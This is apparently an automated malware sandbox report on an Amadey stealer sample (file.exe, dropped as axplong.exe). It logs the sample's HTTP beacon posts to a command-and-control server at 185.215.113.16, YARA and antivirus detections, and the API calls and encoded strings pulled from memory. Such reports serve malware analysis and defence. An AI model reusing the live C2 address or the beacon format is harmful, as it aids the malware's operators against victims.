                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    66 | 192.168.2.7 | 49773 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:13.173177004 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:30:13.871176004 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    67 | 192.168.2.7 | 49774 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:30:13.880822897 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:30:14.618988037 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:30:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0



                    Target ID:0
                    Start time:19:28:09
                    Start date:26/09/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x3c0000
                    File size:1'942'016 bytes
                    MD5 hash:544CA28AA15B5ED1C6EE914B09E6F3C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1358005555.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1398782734.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:19:28:11
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0x790000
                    File size:1'942'016 bytes
                    MD5 hash:544CA28AA15B5ED1C6EE914B09E6F3C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1424184795.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1383917764.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 58%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:4
                    Start time:19:29:00
                    Start date:26/09/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0x790000
                    File size:1'942'016 bytes
                    MD5 hash:544CA28AA15B5ED1C6EE914B09E6F3C2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000004.00000003.1862874279.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                      Memory Dump Source
                      • Source File: 00000000.00000002.1402883782.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4e50000_file.jbxd

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:7.3%
                      Total number of Nodes:599
                      Total number of Limit Nodes:41
792c09 14071->14072 14081 792c40 14071->14081 14072->14014 14074 792c18 std::_Xinvalid_argument 14076 7ab784 14075->14076 14080 7ab7a3 Concurrency::details::_Reschedule_chore 14075->14080 14084 7acaa7 14076->14084 14078 7ab794 14078->14080 14086 7ab74e 14078->14086 14080->14071 14092 7ab72b 14081->14092 14083 792c72 shared_ptr 14083->14074 14085 7acac2 CreateThreadpoolWork 14084->14085 14085->14078 14087 7ab757 Concurrency::details::_Reschedule_chore 14086->14087 14090 7accfc 14087->14090 14089 7ab771 14089->14080 14091 7acd11 TpPostWork 14090->14091 14091->14089 14093 7ab747 14092->14093 14094 7ab737 14092->14094 14093->14083 14094->14093 14096 7ac9a8 14094->14096 14097 7ac9bd TpReleaseWork 14096->14097 14097->14093 14104 7a8700 14105 7a875a __cftof 14104->14105 14111 7a9ae0 14105->14111 14107 7a8784 14110 7a879c 14107->14110 14115 7943b0 14107->14115 14109 7a8809 std::_Throw_future_error 14112 7a9b15 14111->14112 14121 792ca0 14112->14121 14114 7a9b46 14114->14107 14116 7abe0f InitOnceExecuteOnce 14115->14116 14117 7943ca 14116->14117 14118 7943d1 14117->14118 14119 7c6beb 9 API calls 14117->14119 14118->14109 14120 7943e4 14119->14120 14122 792cdd 14121->14122 14123 7abe0f InitOnceExecuteOnce 14122->14123 14126 792d06 14123->14126 14124 792d11 14124->14114 14125 792d48 14137 792400 14125->14137 14126->14124 14126->14125 14130 7abe27 14126->14130 14131 7abe33 std::_Xinvalid_argument 14130->14131 14132 7abe9a 14131->14132 14133 7abea3 14131->14133 14140 7abdaf 14132->14140 14134 792aa0 10 API calls 14133->14134 14136 7abe9f 14134->14136 14136->14125 14158 7ab506 14137->14158 14139 792432 14141 7acb61 InitOnceExecuteOnce 14140->14141 14142 7abdc7 14141->14142 14143 7abdce 14142->14143 14146 7c6beb 14142->14146 14143->14136 14145 7abdd7 14145->14136 14153 7c6bf7 14146->14153 14147 7c8aaf __fassign 4 API calls 14148 7c6c26 14147->14148 14149 7c6c35 14148->14149 14150 7c6c43 14148->14150 14151 7c6c99 9 API calls 14149->14151 14152 7c68bd 4 API calls 14150->14152 14154 
7c6c3f 14151->14154 14155 7c6c5d 14152->14155 14153->14147 14154->14145 14156 7c6c99 9 API calls 14155->14156 14157 7c6c71 __freea 14155->14157 14156->14157 14157->14145 14159 7ab521 std::_Xinvalid_argument 14158->14159 14160 7c8aaf __fassign 4 API calls 14159->14160 14162 7ab588 __fassign 14159->14162 14161 7ab5cf 14160->14161 14162->14139

                      Control-flow Graph (function 0079BD60)
                      APIs
                      • InternetOpenW.WININET(007E8D70,00000000,00000000,00000000,00000000), ref: 0079BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0079BE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 0079BE5B
                      • HttpSendRequestA.WININET(?,00000000), ref: 0079BF1A
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 0079BFCD
                      • InternetCloseHandle.WININET(?), ref: 0079C0A7
                      • InternetCloseHandle.WININET(?), ref: 0079C0AF
                      • InternetCloseHandle.WININET(?), ref: 0079C0B7
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmp
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-332458646
                      • Opcode ID: 9cd8e159eeea685a06b09451b5348b43557c8af31fa5309c92e0fcb1a135221a
                      • Instruction ID: bc22c7012a281da3efbd14a4762f44aa87ec3320013abf533d8b872719742cdc
                      • Opcode Fuzzy Hash: 9cd8e159eeea685a06b09451b5348b43557c8af31fa5309c92e0fcb1a135221a
                      • Instruction Fuzzy Hash: 83B1E6B1A00118DBDF25CF28DC88BADBB75EF45304F504199F50997282E7789AC0CF95

                      Control-flow Graph (function 007965B0)
                      APIs
                      • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00796650
                      Similarity
                      • API ID: AccountLookupName
                      • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                      • API String ID: 1484870144-3856690409
                      • Opcode ID: 52b6dc3889e5cfbdd32bc4c8029dc9cbe87a5ea4a9ce38dbfca98333e2a29e71
                      • Instruction ID: 9e4f9847170ddf7d312be42a7c56d3467d37685868fc75545aeda9e15683a00d
                      • Opcode Fuzzy Hash: 52b6dc3889e5cfbdd32bc4c8029dc9cbe87a5ea4a9ce38dbfca98333e2a29e71
                      • Instruction Fuzzy Hash: BC91A3B19001189BDF28EB64DC85BEDB779EB45304F4046EDE50997282EA789FC4CFA4
                      APIs
                        • Part of subcall function 007A7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 007A795C
                        • Part of subcall function 007A7870: __Cnd_destroy_in_situ.LIBCPMT ref: 007A7968
                        • Part of subcall function 007A7870: __Mtx_destroy_in_situ.LIBCPMT ref: 007A7971
                        • Part of subcall function 0079BD60: InternetOpenW.WININET(007E8D70,00000000,00000000,00000000,00000000), ref: 0079BDED
                        • Part of subcall function 0079BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0079BE11
                        • Part of subcall function 0079BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0079BE5B
                      • std::_Xinvalid_argument.LIBCPMT ref: 007A4EA2
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 2f144420214d22028567090664c9a10cfbe1f0696dc088af709ac0281a006ed5
                      • Instruction ID: 6958c519fe89293dffe3ced0fd77af8735ae057de33add5b9ea291249a95cb73
                      • Opcode Fuzzy Hash: 2f144420214d22028567090664c9a10cfbe1f0696dc088af709ac0281a006ed5
                      • Instruction Fuzzy Hash: 6723F371E00158DBEB19DB28CD8979DBB769BC2304F548298E0096B2C6EB7D5F84CF51

                      Control-flow Graph (function 00795DF0)
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 77193c3918f65ff775ea90755d534885d7c91aeae58fb90752fa6b3e2984db89
                      • Instruction ID: 3efab643e4685f98cd825c80380caa1db2201a8ca190132509adba2b06cef156
                      • Opcode Fuzzy Hash: 77193c3918f65ff775ea90755d534885d7c91aeae58fb90752fa6b3e2984db89
                      • Instruction Fuzzy Hash: F2E18E71900218ABEF25DFA4CC89BDEB779AB05304F5042D9E409A7291E778AFC4CF51

                      Control-flow Graph (function 00797D00)
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00797EA3
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: b6359a007f6538a88fcf9db4b8698a3429e4e7f873801763d1779ef2b56fb964
                      • Instruction ID: f17dcf1d98f551a072d00b3b487bf9683a689bb9af575d6770230e802b150e7b
                      • Opcode Fuzzy Hash: b6359a007f6538a88fcf9db4b8698a3429e4e7f873801763d1779ef2b56fb964
                      • Instruction Fuzzy Hash: 61D1C5B1E04618DBDF14FB28EC4A3AD7761AB42320F544288E4156B3C2DB7D9E81CBD2

                      Control-flow Graph (function 007C6E01)
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 007C6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 007C6E7D
                      • __dosmaperr.LIBCMT ref: 007C6F12
                        • Part of subcall function 007C7177: __dosmaperr.LIBCMT ref: 007C71AC
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 78926e1b748042fcbe6a97926c7977280f5ce5a5688c2f6e85a55fd744d7793b
                      • Instruction ID: 35dbb786aa96dd213e12236e8b331e2bacf2074627bc3950ad2a5330c0452fe8
                      • Opcode Fuzzy Hash: 78926e1b748042fcbe6a97926c7977280f5ce5a5688c2f6e85a55fd744d7793b
                      • Instruction Fuzzy Hash: E1414F75900644ABDB24EFB5E885EAFBBF9EF88300B10441DF856D3210EB34A944CB61

                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: hpG|
                      • API String ID: 0-1840024693
                      • Opcode ID: a9bcbed6c95320603dc144d008a86ea57a1a89f194355d2d18e7719068753dc9
                      • Instruction ID: 43c98e319c64ee642dcb57e4ff6757dd963bc152974fe6c3b3d0766443ed8590
                      • Opcode Fuzzy Hash: a9bcbed6c95320603dc144d008a86ea57a1a89f194355d2d18e7719068753dc9
                      • Instruction Fuzzy Hash: DD61D272D012149BDF35EFA8E889FADB7A0AB55354F24813EE449BB250D7399D00CB61

                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00798454
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 62d04cdf516f6e0a0051517e3f6434c51390817baae85f9cdb3943400e41a41c
                      • Instruction ID: 575d7a7446970241dc19b6c1e9c69b8a718e2a07adce4797fc4556e7c26c22fd
                      • Opcode Fuzzy Hash: 62d04cdf516f6e0a0051517e3f6434c51390817baae85f9cdb3943400e41a41c
                      • Instruction Fuzzy Hash: 41512771D002589BEF24EF28DD49BEDB7759F46310F504299E804A73D2EB399E808B92

                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b39471fc451e58a8164ae456a56455a4c8530f08670fa8e2801b5f6dc47529e
                      • Instruction ID: f62f9da517b7a151855650982c0c51ef8e4dffbacbce6d666d50696d8221f127
                      • Opcode Fuzzy Hash: 8b39471fc451e58a8164ae456a56455a4c8530f08670fa8e2801b5f6dc47529e
                      • Instruction Fuzzy Hash: C5213772A05608BAEF117B649C86FAF37299F41778F20035CF9243B1D1DB789E0196A1

                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 007C6FB3
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 9b132883f0ce5fdf0d22d4a45ed9c36f9198213223aca0fa4514129e9fa87fc9
                      • Instruction ID: b4736b19fa5968d615a03fc2bfc20606aac55a67772973d89cc22194c2f3d3f8
                      • Opcode Fuzzy Hash: 9b132883f0ce5fdf0d22d4a45ed9c36f9198213223aca0fa4514129e9fa87fc9
                      • Instruction Fuzzy Hash: 2911ECB690020CAFDB10DE95D984FDFB7BCAB48310F50526EE511E6180EB34EB45CB61

                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,007CA5ED,?,007C74AE,?,00000000,?), ref: 007CD730
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: daf1a6d1ef0dc805f55a0b1f256f2717fc143e9e291584f89069ea804b4f3ad0
                      • Instruction ID: 2cb8d98d08e0235a4d2014b7b16727ff2dcaf2c98664221295cf1dfe6d40835a
                      • Opcode Fuzzy Hash: daf1a6d1ef0dc805f55a0b1f256f2717fc143e9e291584f89069ea804b4f3ad0
                      • Instruction Fuzzy Hash: D8F0E931685124A69B313A259C05F5B7B999F817B0B18813DEC04AA181DE7DEC0087F1

                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 02ba47319f66dd0475a9b1fc6a497915829d1107f21c9bdf738a131e30671c1c
                      • Instruction ID: bff9b74260ffcd874afe739035959a542c5293dcde4ef667914b7d44f39ad44a
                      • Opcode Fuzzy Hash: 02ba47319f66dd0475a9b1fc6a497915829d1107f21c9bdf738a131e30671c1c
                      • Instruction Fuzzy Hash: FFF0F9B1E00518EBC700BB689C0B72D7B75A747720F940348E811673D2DB7C590187D2
                      Memory Dump Source
                      • Source File: 00000004.00000002.2608793540.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4bb0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c1fdcf288f294ffea85887820d98ce586b514730f1409fdab34e8816c50dc79
                      • Instruction ID: 669aa59eb72a5edc749d0b9eb051783cf29f798a40073f851fd84181d90a00e4
                      • Opcode Fuzzy Hash: 0c1fdcf288f294ffea85887820d98ce586b514730f1409fdab34e8816c50dc79
                      • Instruction Fuzzy Hash: 68E02B5718C5509D4143755A41C43F67B12776B23033806C688C70A2A2F5853849F5D5
                      Memory Dump Source
                      • Source File: 00000004.00000002.2608793540.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4bb0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64cefb48139f05d878558e1d0054c9e12450f7ced3d3a9aabc15816115b9a9d1
                      • Instruction ID: 69ad8b7fff1df11ab889a85d5cd1b2eaf195e6fbbb52deed54f1c1b9582f1519
                      • Opcode Fuzzy Hash: 64cefb48139f05d878558e1d0054c9e12450f7ced3d3a9aabc15816115b9a9d1
                      • Instruction Fuzzy Hash: 72E0269A348704EEC042349A8A883F3764633773307A043D16DD3195D1F6D93089B2D1
                      Memory Dump Source
                      • Source File: 00000004.00000002.2608793540.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_4bb0000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1df5e7e5d2979c860d3bfbf452d488b6ae64d6a59171b57dfd1f9636668c265
                      • Instruction ID: a377df62e50585c717c57c5e728df5e0ad52db980618be86786eefa92aa1de62
                      • Opcode Fuzzy Hash: c1df5e7e5d2979c860d3bfbf452d488b6ae64d6a59171b57dfd1f9636668c265
                      • Instruction Fuzzy Hash: 25D05B5B34C611E88182314A91893F79A42376723126443D36DD7085D1F9C93199B1D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$fed3aa
                      • API String ID: 0-3582826820
                      • Opcode ID: 878e2bf2530bc459b2ea1fda87d38c18f501edf68cccd58beee938c2f8efb748
                      • Instruction ID: 3256377c84d8a8066a434f02089d5442d4b837c949d5d37b299fa1a67577e46e
                      • Opcode Fuzzy Hash: 878e2bf2530bc459b2ea1fda87d38c18f501edf68cccd58beee938c2f8efb748
                      • Instruction Fuzzy Hash: 9672D670A04248DBEF18EF68C9497DD7FB6AB46304F508299E805673C2D77D9A84CBD2
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: e3b8c6c16511c4aa11600edc83c8db887dade550bf9cbe58ca310af313a97656
                      • Instruction ID: 28a41a20ce706e66ed23df98004462e70be4d170686994e4227631bb74d11568
                      • Opcode Fuzzy Hash: e3b8c6c16511c4aa11600edc83c8db887dade550bf9cbe58ca310af313a97656
                      • Instruction Fuzzy Hash: F0C22871E086288FDB25CE28DD447A9B7B5EB48315F1441EBD84EA7340E779AE818F41
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: cea52adddad7ef096458f310c446f6750624482400a0aa9896ac0db80e10d95f
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 7CF13F71E012199FDF14CFA8C9806AEF7B1FF98314F15826AE819A7345D735AE42CB90
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,007ACE82,?,?,?,?,007ACEB7,?,?,?,?,?,?,007AC42D,?,00000001), ref: 007ACB33
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 68fcdeeb20e31534a7d38424a36eba8f299ae836c63c7bc05de6a27a253b5200
                      • Instruction ID: d0c0c553aae4a640587d53217e600d8cb88f9b9f607e17a73d3fcfbf3863ab38
                      • Opcode Fuzzy Hash: 68fcdeeb20e31534a7d38424a36eba8f299ae836c63c7bc05de6a27a253b5200
                      • Instruction Fuzzy Hash: 3BD02232503038A3CA063B98EC048ACBB0CAA46B103014311EE056BF208A9AAC409BE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: d64a3bfa5bbb4e13b1459e274866447c8275f953c453143e7dfd3339b0331d77
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: E351377230C64896DB3C9A3888DAFBE679A9F61300F14045DD843D7682DE5DDD45CF62
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9ab0a773eb17abc798e8a758d11247c5dc64fbde147b778b7b23e1d3a04182a7
                      • Instruction ID: 1457fa763e3dd6be0b7bf5b3e3b4677feecea600868370924ab646312cc1a9e6
                      • Opcode Fuzzy Hash: 9ab0a773eb17abc798e8a758d11247c5dc64fbde147b778b7b23e1d3a04182a7
                      • Instruction Fuzzy Hash: 48224EB3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c110ad83820fda94993b0cd4d58b63d01a25c61c7ef882136eceaef9cf14c02f
                      • Instruction ID: 6c2de14838765dc10461d5e379f7bf2418c8438762e87bb0d3dfac1b3e4504ba
                      • Opcode Fuzzy Hash: c110ad83820fda94993b0cd4d58b63d01a25c61c7ef882136eceaef9cf14c02f
                      • Instruction Fuzzy Hash: 67B14A31214609DFD719CF28C486B657BB1FF45364F29865AE899CF3A1D33AE982CB40
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 0079247E
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: 1f12f649fce8a1fa8dffa148c32a30db4616a6410ecf59ea8bc6ddb293338267
                      • Instruction ID: 7fd34605d7073fadf166f2302ca8acc172652fe83c7493daa1fd7cf1d9eaf5f1
